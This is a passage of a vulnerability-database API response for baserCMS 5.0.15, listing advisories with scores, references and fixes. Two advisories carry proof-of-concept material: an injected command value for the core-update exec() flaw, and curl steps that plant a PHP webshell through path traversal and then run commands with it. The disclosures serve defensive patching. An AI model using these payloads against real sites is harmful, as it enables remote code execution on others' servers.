Package Instance
Lookup for vulnerable packages by Package URL.
GET /api/packages/775718?format=api
{ "url": "http://public2.vulnerablecode.io/api/packages/775718?format=api", "purl": "pkg:composer/baserproject/basercms@5.0.15", "type": "composer", "namespace": "baserproject", "name": "basercms", "version": "5.0.15", "qualifiers": {}, "subpath": "", "is_vulnerable": true, "next_non_vulnerable_version": "5.2.3", "latest_non_vulnerable_version": "5.2.3", "affected_by_vulnerabilities": [ { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/91611?format=api", "vulnerability_id": "VCID-3new-f12y-8bf9", "summary": "baserCMS has Unsafe File Upload Leading to Remote Code Execution (RCE)\n### Details\nThe application's restore function allows users to upload a `.zip` file, which is then automatically extracted. A PHP file inside the archive is included using `require_once` without validating or restricting the filename. An attacker can craft a malicious PHP file within the zip and achieve arbitrary code execution when it is included.\n\nVector: Malicious ZIP upload + insecure `require_once`\n\n### PoC\n1. Restore backup\n \n1. Load file shell (insecure `require_once`)\n \n \n\n### Impact\nRemote Code Execution (RCE)", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2025-32957", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00031", "scoring_system": "epss", "scoring_elements": "0.09459", "published_at": "2026-06-05T12:55:00Z" }, { "value": "0.00031", "scoring_system": "epss", "scoring_elements": "0.09479", "published_at": "2026-06-06T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2025-32957" }, { "reference_url": "https://basercms.net/security/JVN_20837860", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.7", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track*", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2026-03-31T18:39:21Z/" } ], "url": "https://basercms.net/security/JVN_20837860" }, { "reference_url": "https://github.com/baserproject/basercms", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.7", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/baserproject/basercms" }, { "reference_url": "https://github.com/baserproject/basercms/releases/tag/5.2.3", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.7", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track*", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2026-03-31T18:39:21Z/" } ], "url": "https://github.com/baserproject/basercms/releases/tag/5.2.3" }, { "reference_url": "https://github.com/baserproject/basercms/security/advisories/GHSA-hv78-cwp4-8r7r", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.7", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track*", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2026-03-31T18:39:21Z/" } ], "url": "https://github.com/baserproject/basercms/security/advisories/GHSA-hv78-cwp4-8r7r" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2025-32957", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.7", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-32957" }, { "reference_url": "https://github.com/advisories/GHSA-hv78-cwp4-8r7r", "reference_id": "GHSA-hv78-cwp4-8r7r", "reference_type": "", "scores": [], "url": "https://github.com/advisories/GHSA-hv78-cwp4-8r7r" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/112578?format=api", "purl": "pkg:composer/baserproject/basercms@5.2.3", "is_vulnerable": false, "affected_by_vulnerabilities": [], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:composer/baserproject/basercms@5.2.3" } ], "aliases": [ "CVE-2025-32957", "GHSA-hv78-cwp4-8r7r" ], "risk_score": 4.0, "exploitability": "0.5", "weighted_severity": "8.0", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-3new-f12y-8bf9" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/91137?format=api", "vulnerability_id": "VCID-4zw8-truk-pugf", "summary": "baserCMS has OS Command Injection Leading to Remote Code Execution (RCE)\n## Summary\n\nIn the core update functionality of baserCMS, some parameters sent from the admin panel are passed to the `exec()` function without proper validation or escaping. This issue allows **an authenticated CMS administrator to execute arbitrary OS commands on the server (Remote Code Execution, RCE)**.\n\nThis vulnerability is not a UI-level issue such as screen manipulation or lack of CSRF protection, but rather stems from **a design that directly executes input values received on the server side as OS commands**. Therefore, even if buttons are hidden in the UI, or even if CakePHP's CSRF/FormProtection (SecurityComponent) ensures that only legitimate POST requests are accepted, **an attack is possible as long as a request containing a valid token is processed within an administrator session**.\n\n---\n\n## Vulnerability Information\n\n| Item | Details |\n| ---- | ------- |\n| CWE | CWE-78: Improper Neutralization of Special Elements used in an OS Command |\n| Impact | Remote Code Execution (RCE) |\n| Severity | Critical |\n| Attack Requirements | Administrator privileges required |\n| Reproducibility | Reproducible (confirmed multiple times) |\n| Test Environment | baserCMS 5.2.2 (Docker / development environment) |\n\n---\n\n## Affected Areas\n\n- **Controller**\n - `PluginsController::get_core_update()`\n- **Service**\n - `PluginsService::getCoreUpdate()`\n- **Affected Endpoint**\n - `/baser/admin/baser-core/plugins/get_core_update`\n\n---\n\n## Technical Details\n\n### Vulnerable Code Flow\n\n```text\nPluginsController::get_core_update()\n ↓ Retrieves php parameter from POST data\nPluginsService::getCoreUpdate($targetVersion, $php, $force)\n ↓ Concatenates $php into command string without validation or escaping\nexec($command)\n```\n\n### Relevant Code (Excerpt)\n\n**PluginsController.php**\n\n```php\n$service->getCoreUpdate(\n $request->getData('targetVersion') ?? '',\n $request->getData('php') ?? 'php',\n $request->getData('force'),\n);\n```\n\n**PluginsService.php**\n\n```php\n$command = $php . ' ' . ROOT . DS . 'bin' . DS . 'cake.php composer ' .\n $targetVersion . ' --php ' . $php . ' --dir ' . TMP . 'update';\n\nexec($command, $out, $code);\n```\n\nThe `$php` parameter is user input, and **none** of the following countermeasures are in place:\n\n- Restriction via allowlist\n- Validation via regular expression\n- Escaping via `escapeshellarg()` or similar\n\n---\n\n## Attack Scenario\n\n1. The attacker logs in as a CMS administrator\n2. Sends a POST request to the core update functionality in the admin panel\n3. Specifies a string containing OS commands in the `php` parameter\n4. `exec()` is executed on the server side, running the arbitrary OS command\n\n### Example Attack Input (Conceptual)\n\n```text\nphp=php;id>/tmp/rce_test;#\n```\n\n---\n\n## Verification Results (PoC)\n\n### Execution Result\n\n```bash\n$ docker exec bc-php cat /tmp/rce_test\nuid=1000(www-data) gid=1000(www-data) groups=1000(www-data)\n```\n\nThe above confirms that OS commands can be executed with `www-data` privileges.\n\n### Additional Notes\n\n- Reproducible through the legitimate flow in the admin panel (browser)\n- Succeeds even with CSRF/FormProtection tokens included in a legitimate request\n- Failure cases (400/403) have also been investigated and differentiated\n- Confirmed reproducible via resending HTTP requests with tools such as curl (resending the same request containing valid tokens)\n\n---\n\n## Impact\n\nIf this vulnerability is exploited, the following becomes possible:\n\n- Retrieval of server information\n- Reading/writing arbitrary files\n- Retrieval of application configuration information (DB credentials, etc.)\n- OS-level operations beyond application permission boundaries\n\nAlthough administrator privileges are required, **this is a design issue where the impact extends from the application layer to the OS layer**, and the impact is considered significant.\n\n---\n\n## Recommended Fix\n\n### Primary Recommendation\n\n- Do not accept the PHP executable path from user input\n- Fix the PHP executable on the server side using the `PHP_BINARY` constant\n\n```php\n$php = escapeshellarg(PHP_BINARY);\n```\n\n### Supplementary Fix Recommendations\n\n- Apply `escapeshellarg()` escaping to other command-line arguments (version number, directory, etc.) as well\n- If possible, consider using execution methods that do not involve shell interpretation (array format, Process class, etc.)\n\n### Alternative (Not Recommended)\n\n- Allowlist validation for the PHP executable path\n- Combined use of regex validation and `escapeshellarg()`\n\nHowever, **from the perspective of reducing the attack surface, a design that eliminates user input entirely is recommended**.\n\n---\n\n## Additional Notes\n\n- This issue is independent of UI display controls (showing/hiding buttons)\n- As long as the endpoint exists, an attack is possible if a request containing valid tokens is processed\n- This is a problem stemming from the design-level handling of input, and cannot be prevented by CSRF or UI controls alone\n\n---\n\n## Conclusion\n\nDue to a design issue in baserCMS's core update functionality where user input is passed to `exec()` without validation, **Remote Code Execution (RCE) is achievable with administrator privileges**. This vulnerability can be fixed through input validation and design review, and prompt remediation is recommended.\n\nThis advisory was translated from Japanese to English using GitHub Copilot.", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-21861", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00131", "scoring_system": "epss", "scoring_elements": "0.32198", "published_at": "2026-06-05T12:55:00Z" }, { "value": "0.00131", "scoring_system": "epss", "scoring_elements": "0.32167", "published_at": "2026-06-06T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-21861" }, { "reference_url": "https://basercms.net/security/JVN_20837860", "reference_id": "", "reference_type": "", "scores": [ { "value": "9.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H" }, { "value": "CRITICAL", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track*", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2026-03-31T14:01:36Z/" } ], "url": "https://basercms.net/security/JVN_20837860" }, { "reference_url": "https://github.com/baserproject/basercms", "reference_id": "", "reference_type": "", "scores": [ { "value": "9.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H" }, { "value": "CRITICAL", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/baserproject/basercms" }, { "reference_url": "https://github.com/baserproject/basercms/releases/tag/5.2.3", "reference_id": "", "reference_type": "", "scores": [ { "value": "9.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H" }, { "value": "CRITICAL", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track*", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2026-03-31T14:01:36Z/" } ], "url": "https://github.com/baserproject/basercms/releases/tag/5.2.3" }, { "reference_url": "https://github.com/baserproject/basercms/security/advisories/GHSA-qxmc-6f24-g86g", "reference_id": "", "reference_type": "", "scores": [ { "value": "9.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H" }, { "value": "CRITICAL", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track*", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2026-03-31T14:01:36Z/" } ], "url": "https://github.com/baserproject/basercms/security/advisories/GHSA-qxmc-6f24-g86g" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-21861", "reference_id": "", "reference_type": "", "scores": [ { "value": "9.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H" }, { "value": "CRITICAL", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-21861" }, { "reference_url": "https://github.com/advisories/GHSA-qxmc-6f24-g86g", "reference_id": "GHSA-qxmc-6f24-g86g", "reference_type": "", "scores": [], "url": "https://github.com/advisories/GHSA-qxmc-6f24-g86g" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/112578?format=api", "purl": "pkg:composer/baserproject/basercms@5.2.3", "is_vulnerable": false, "affected_by_vulnerabilities": [], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:composer/baserproject/basercms@5.2.3" } ], "aliases": [ "CVE-2026-21861", "GHSA-qxmc-6f24-g86g" ], "risk_score": 4.5, "exploitability": "0.5", "weighted_severity": "9.0", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-4zw8-truk-pugf" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/91016?format=api", "vulnerability_id": "VCID-7x3n-4c2b-nfbx", "summary": "baserCMS has OS command injection vulnerability in installer\nbaserCMS has an OS command injection vulnerability in the installer.\n\n### Target\nbaserCMS 5.2.2 and earlier versions\n\n### Vulnerability\n\nIf baserCMS is placed on a server but not installed, malicious commands may be executed.\n\n### Countermeasures\nUpdate to the latest version of baserCMS\n\nPlease refer to the following page to reference for more information.\nhttps://basercms.net/security/JVN_54513170\n\n### Credits\n\nREN XINGDIAN", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-30880", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00055", "scoring_system": "epss", "scoring_elements": "0.17526", "published_at": "2026-06-05T12:55:00Z" }, { "value": "0.00055", "scoring_system": "epss", "scoring_elements": "0.17521", "published_at": "2026-06-06T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-30880" }, { "reference_url": "https://basercms.net/security/JVN_20837860", "reference_id": "", "reference_type": "", "scores": [ { "value": "9.2", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N" }, { "value": "CRITICAL", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-03-31T15:27:05Z/" } ], "url": "https://basercms.net/security/JVN_20837860" }, { "reference_url": "https://github.com/baserproject/basercms", "reference_id": "", "reference_type": "", "scores": [ { "value": "9.2", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N" }, { "value": "CRITICAL", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/baserproject/basercms" }, { "reference_url": "https://github.com/baserproject/basercms/releases/tag/5.2.3", "reference_id": "", "reference_type": "", "scores": [ { "value": "9.2", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N" }, { "value": "CRITICAL", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-03-31T15:27:05Z/" } ], "url": "https://github.com/baserproject/basercms/releases/tag/5.2.3" }, { "reference_url": "https://github.com/baserproject/basercms/security/advisories/GHSA-6hpg-8rx3-cwgv", "reference_id": "", "reference_type": "", "scores": [ { "value": "9.2", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N" }, { "value": "CRITICAL", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-03-31T15:27:05Z/" } ], "url": "https://github.com/baserproject/basercms/security/advisories/GHSA-6hpg-8rx3-cwgv" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-30880", "reference_id": "", "reference_type": "", "scores": [ { "value": "9.2", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N" }, { "value": "CRITICAL", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-30880" }, { "reference_url": "https://github.com/advisories/GHSA-6hpg-8rx3-cwgv", "reference_id": "GHSA-6hpg-8rx3-cwgv", "reference_type": "", "scores": [], "url": "https://github.com/advisories/GHSA-6hpg-8rx3-cwgv" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/112578?format=api", "purl": "pkg:composer/baserproject/basercms@5.2.3", "is_vulnerable": false, "affected_by_vulnerabilities": [], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:composer/baserproject/basercms@5.2.3" } ], "aliases": [ "CVE-2026-30880", "GHSA-6hpg-8rx3-cwgv" ], "risk_score": 4.5, "exploitability": "0.5", "weighted_severity": "9.0", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-7x3n-4c2b-nfbx" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/91437?format=api", "vulnerability_id": "VCID-8buz-nsr9-3yge", "summary": "baserCMS Path Traversal Leads to Arbitrary File Write and RCE via Theme File API\n## Summary\n\nA path traversal vulnerability exists in the baserCMS 5.x theme file management API (`/baser/api/admin/bc-theme-file/theme_files/add.json`) that allows arbitrary file write.\n\nAn authenticated administrator can include `../` sequences in the `path` parameter to create a PHP file in an arbitrary directory outside the theme directory, which may result in remote code execution (RCE).\n\n## Affected Code\n\n**File**: `plugins/bc-theme-file/src/Service/BcThemeFileService.php`\n\n```php\npublic function getFullpath(string $theme, string $plugin, string $type, string $path)\n{\n // ...\n return $viewPath . $type . DS . $path; // $path is not sanitized\n}\n```\n\n## Attack Scenario\n\n1. The attacker compromises an administrator account (password leak, brute force, etc.)\n2. Obtains an access token via API login\n3. Specifies `path: \"../../../../webroot/\"` in the theme file creation API\n4. A PHP file is created in the webroot\n5. The attacker accesses the created PHP file to achieve RCE\n\n## Reproduction Steps\n\n```bash\n# 1. Login\ncurl -X POST \"http://target/baser/api/admin/baser-core/users/login.json\" \\\n -H \"Content-Type: application/json\" \\\n -d '{\"email\":\"admin@example.com\",\"password\":\"password\"}'\n\n# 2. Create webshell\ncurl -X POST \"http://target/baser/api/admin/bc-theme-file/theme_files/add.json\" \\\n -H \"Authorization: Bearer <token>\" \\\n -H \"Content-Type: application/json\" \\\n -d '{\n \"theme\": \"BcThemeSample\",\n \"plugin\": \"\",\n \"type\": \"layout\",\n \"path\": \"../../../../webroot/\",\n \"base_name\": \"shell\",\n \"ext\": \"php\",\n \"contents\": \"<?php system($_GET[\\\"cmd\\\"]); ?>\"\n }'\n\n# 3. RCE\ncurl \"http://target/shell.php?cmd=id\"\n```\n\n## Vulnerability Details\n\n| Item | Details |\n|------|---------|\n| CWE | CWE-22: Path Traversal, CWE-73: External Control of File Name or Path |\n| Impact | Arbitrary file write, Remote Code Execution (RCE) |\n| Attack Prerequisites | Administrator privileges + API enabled (`USE_CORE_ADMIN_API=true`), or chaining with XSS, etc. |\n| Reproducibility | High (PoC verified) |\n| Test Environment | baserCMS 5.x (Docker environment) |\n\n### Additional Notes on Attack Prerequisites\n\n- **When API is enabled** (`USE_CORE_ADMIN_API=true`): API calls can be made externally using JWT token authentication. Direct exploitation is possible.\n- **Default settings** (`USE_CORE_ADMIN_API=false`): Direct external API calls are prohibited. CSRF protection is also active, so this vulnerability alone cannot be exploited. An exploit chain involving XSS or similar is required.\n\n## Recommended Fix\n\nRather than relying on simple string replacement or blacklist checks of input, the canonicalized path (using `realpath()`, etc.) should be verified to be within the theme base directory after file creation or immediately before writing. If the path falls outside the boundary, the operation should be rejected.\n\nThe specific implementation location and method are left to the project's design decisions.\n\n## Comparison with Other CMS\n\nWordPress's theme editor only allows editing within `wp-content/themes/` and does not permit writes outside that directory. [CVE-2019-8943](https://www.sonarsource.com/blog/wordpress-image-remote-code-execution/) was reported as a path traversal vulnerability in `wp_crop_image()` that allowed writing cropped image output to an arbitrary directory by including `../` in the filename.\n\nThis vulnerability is not a matter of \"administrators being able to execute arbitrary code\" by design, but rather stems from a security boundary violation where \"the theme editing function can write outside the theme directory (to webroot, config, etc.).\"\n\n## Resources\n\n- OWASP Path Traversal: <https://owasp.org/www-community/attacks/Path_Traversal>\n- WordPress RCE via Path Traversal (CVE-2019-8943): <https://www.sonarsource.com/blog/wordpress-image-remote-code-execution/>\n- Jira Path Traversal (CVE-2025-22167): <https://nvd.nist.gov/vuln/detail/CVE-2025-22167>\n\nThis advisory was translated from Japanese to English using GitHub Copilot.", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-30940", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00145", "scoring_system": "epss", "scoring_elements": "0.34571", "published_at": "2026-06-05T12:55:00Z" }, { "value": "0.00145", "scoring_system": "epss", "scoring_elements": "0.34588", "published_at": "2026-06-06T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-30940" }, { "reference_url": "https://basercms.net/security/JVN_20837860", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.2", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-04-02T14:46:24Z/" } ], "url": "https://basercms.net/security/JVN_20837860" }, { "reference_url": "https://github.com/baserproject/basercms", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.2", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/baserproject/basercms" }, { "reference_url": "https://github.com/baserproject/basercms/releases/tag/5.2.3", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.2", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-04-02T14:46:24Z/" } ], "url": "https://github.com/baserproject/basercms/releases/tag/5.2.3" }, { "reference_url": "https://github.com/baserproject/basercms/security/advisories/GHSA-c5c6-37vq-pjcq", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.2", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-04-02T14:46:24Z/" } ], "url": "https://github.com/baserproject/basercms/security/advisories/GHSA-c5c6-37vq-pjcq" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-30940", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.2", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-30940" }, { "reference_url": "https://github.com/advisories/GHSA-c5c6-37vq-pjcq", "reference_id": "GHSA-c5c6-37vq-pjcq", "reference_type": "", "scores": [], "url": "https://github.com/advisories/GHSA-c5c6-37vq-pjcq" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/112578?format=api", "purl": "pkg:composer/baserproject/basercms@5.2.3", "is_vulnerable": false, "affected_by_vulnerabilities": [], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:composer/baserproject/basercms@5.2.3" } ], "aliases": [ "CVE-2026-30940", "GHSA-c5c6-37vq-pjcq" ], "risk_score": 4.0, "exploitability": "0.5", "weighted_severity": "8.0", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-8buz-nsr9-3yge" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/90966?format=api", "vulnerability_id": "VCID-8ssu-umet-37bk", "summary": "baserCMS is Vulnerable to Cross-site Scripting\nbaserCMS has DOM-based cross-site scripting in tag creation.\n\n### Target\nbaserCMS 5.2.2 and earlier versions\n\n### Vulnerability\n Malicious JavaScript may be executed when creating a tag.\n\n### Countermeasures\nUpdate to the latest version of baserCMS\n\nPlease refer to the following page to reference for more information.\nhttps://basercms.net/security/JVN_94952030\n\n### Credits\n\n- quanlna2 (Le Nguyen Anh Quan)\n- namdi (Do Ich Nam)\n- minhnn42 (Nguyen Ngoc Minh)\n- VCSLab - Viettel Cyber Security", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-32734", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00012", "scoring_system": "epss", "scoring_elements": "0.01622", "published_at": "2026-06-06T12:55:00Z" }, { "value": "0.00012", "scoring_system": "epss", "scoring_elements": "0.01615", "published_at": "2026-06-05T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-32734" }, { "reference_url": "https://basercms.net/security/JVN_20837860", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-03-31T18:50:30Z/" } ], "url": "https://basercms.net/security/JVN_20837860" }, { "reference_url": "https://github.com/baserproject/basercms", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/baserproject/basercms" }, { "reference_url": "https://github.com/baserproject/basercms/releases/tag/5.2.3", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-03-31T18:50:30Z/" } ], "url": "https://github.com/baserproject/basercms/releases/tag/5.2.3" }, { "reference_url": "https://github.com/baserproject/basercms/security/advisories/GHSA-677c-xv24-crgx", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-03-31T18:50:30Z/" } ], "url": "https://github.com/baserproject/basercms/security/advisories/GHSA-677c-xv24-crgx" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-32734", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-32734" }, { "reference_url": "https://github.com/advisories/GHSA-677c-xv24-crgx", "reference_id": "GHSA-677c-xv24-crgx", "reference_type": "", "scores": [], "url": "https://github.com/advisories/GHSA-677c-xv24-crgx" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/112578?format=api", "purl": "pkg:composer/baserproject/basercms@5.2.3", "is_vulnerable": false, "affected_by_vulnerabilities": [], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:composer/baserproject/basercms@5.2.3" } ], "aliases": [ "CVE-2026-32734", "GHSA-677c-xv24-crgx" ], "risk_score": 4.0, "exploitability": "0.5", "weighted_severity": "8.0", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-8ssu-umet-37bk" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/91316?format=api", "vulnerability_id": "VCID-d1sf-cmct-zbh1", "summary": "baserCMS has Mail Form Acceptance Bypass via Public API\n### Summary\nA public mail submission API allows unauthenticated users to submit mail form entries even when the corresponding form is not accepting submissions. This bypasses administrative controls intended to stop form intake and enables spam or abuse via the API.\n\n### Details\nIn baserCMS, mail form submissions through the front-end UI are guarded by acceptance checks implemented in `MailFrontService::isAccepting()`, which ensures that the mail form is currently accepting submissions (e.g. within its configured publish/acceptance window).\n\nThese checks are enforced in the UI flow handled by `MailController::index()` and `MailController::confirm()` \n(e.g. 